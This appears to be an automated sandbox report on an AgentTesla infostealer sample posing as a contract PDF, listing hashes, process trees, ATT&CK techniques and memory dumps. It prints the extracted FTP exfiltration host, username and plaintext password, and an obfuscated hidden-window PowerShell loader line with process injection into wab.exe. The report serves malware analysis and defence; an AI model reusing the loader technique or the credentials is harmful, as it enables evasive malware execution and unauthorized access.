agenttesla | 47c8f1af1f9f8e3a0ad8f359cb14ea08b3261efde59260d8ec5b92d4dfd90587

General

Target

CONTRACTUL MODIFICAT-pdf.bat.exe
Size

857KB
MD5

6606904cf124e2e43df5401efe1aa7f5
SHA1

0700d6cb81beb6a3bb4ff4e941f4e260d7d6795f
SHA256

47c8f1af1f9f8e3a0ad8f359cb14ea08b3261efde59260d8ec5b92d4dfd90587
SHA512

abc409300b90e0db70a91ea64d8aa14458fdc153be7b228e586deaa3fbef68fb3e42d2a882d1aeaa3f25f325553affb204fed42e056f2b2ff7476050e32e2c13
SSDEEP

12288:2TdHutP4ws2ERwovFRG4zNdE1SqYfsyN1fR8MbbAi77tkmY+V5Ekikwh+:2Ti4L2uwovjGiYFqsS1xbHnY+V5Okx

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.piny.ro
Port:
21
Username:
[email protected]
Password:
playingboyz231

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2188 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2808 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2188 powershell.exe
2808 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2188 set thread context of 2808 2188 powershell.exe wab.exe
Drops file in Windows directory 1 IoCs

Processes:

CONTRACTUL MODIFICAT-pdf.bat.exe

description ioc process

File opened for modification C:\Windows\Brugerkataloget.jag CONTRACTUL MODIFICAT-pdf.bat.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2808	wab.exe

description	pid	process	target process
PID 2188 set thread context of 2808	2188	powershell.exe	wab.exe

description	ioc	process
File opened for modification	C:\Windows\Brugerkataloget.jag	CONTRACTUL MODIFICAT-pdf.bat.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exewab.exe

pid	process
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
2808	wab.exe
2808	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2188 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2188 powershell.exe
Token: SeDebugPrivilege 2808 wab.exe

description	pid	process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2808	wab.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

CONTRACTUL MODIFICAT-pdf.bat.exepowershell.exe

description	pid	process	target process
PID 3056 wrote to memory of 2188	3056	CONTRACTUL MODIFICAT-pdf.bat.exe	powershell.exe
PID 3056 wrote to memory of 2188	3056	CONTRACTUL MODIFICAT-pdf.bat.exe	powershell.exe
PID 3056 wrote to memory of 2188	3056	CONTRACTUL MODIFICAT-pdf.bat.exe	powershell.exe
PID 3056 wrote to memory of 2188	3056	CONTRACTUL MODIFICAT-pdf.bat.exe	powershell.exe
PID 2188 wrote to memory of 2672	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2672	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2672	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2672	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe
PID 2188 wrote to memory of 2808	2188	powershell.exe	wab.exe

C:\Users\Admin\AppData\Local\Temp\CONTRACTUL MODIFICAT-pdf.bat.exe
"C:\Users\Admin\AppData\Local\Temp\CONTRACTUL MODIFICAT-pdf.bat.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Licks=cat 'C:\Users\Admin\AppData\Roaming\sidonian\Bespyttedes.Civ';$Antihumanist=$Licks.substring(41927,3);.$Antihumanist($Licks)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2672
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\sidonian\Bespyttedes.Civ

Filesize
78KB

MD5
1ef4bed7239f000331bdf0a88602f2a1

SHA1
e9330cb97761334bc1e3dfeb2594196458547a09

SHA256
b2f0b93f0795e5d02cef80a1a8ffb55470b3d903a08781090c2cef80ba12c2fe

SHA512
3a5073bff3b3d4b6fcd52abedeabc6797a2682d5a676a77c1198da3d26cabd52f82b59ec5d054f0c68aeaa330f33ea70c1746da7e138aa6516bd13163919175a

Download Submit
C:\Users\Admin\AppData\Roaming\sidonian\Silicone.Men

Filesize
300KB

MD5
4941d3dc5698b0ed0e3007a9299e8a91

SHA1
dd0a948f26ddc1c320eadd4878e14b38c8ca17e0

SHA256
6b3e288faec3c663717827c60d1ff261b7e28a4647a9ce1559518544c068d9a6

SHA512
eb0d9cd5de104a4cc5a19cf33b9fbf279a28c19e04afc120b4ca75abf68c03ea47b92ad58a260306d3ec45516c95566185ba510d80aef0ae9af9202676970038

Download Submit
memory/2188-9-0x0000000073AA1000-0x0000000073AA2000-memory.dmp

Filesize
4KB

Download
memory/2188-10-0x0000000073AA0000-0x000000007404B000-memory.dmp

Filesize
5.7MB

Download
memory/2188-11-0x0000000073AA0000-0x000000007404B000-memory.dmp

Filesize
5.7MB

Download
memory/2188-12-0x0000000073AA0000-0x000000007404B000-memory.dmp

Filesize
5.7MB

Download
memory/2188-13-0x0000000073AA0000-0x000000007404B000-memory.dmp

Filesize
5.7MB

Download
memory/2188-17-0x00000000065C0000-0x00000000093AA000-memory.dmp

Filesize
45.9MB

Download
memory/2188-18-0x0000000073AA0000-0x000000007404B000-memory.dmp

Filesize
5.7MB

Download
memory/2808-19-0x0000000000610000-0x0000000001672000-memory.dmp

Filesize
16.4MB

Download
memory/2808-20-0x0000000000610000-0x0000000000652000-memory.dmp

Filesize
264KB

Download

Analysis

Sharing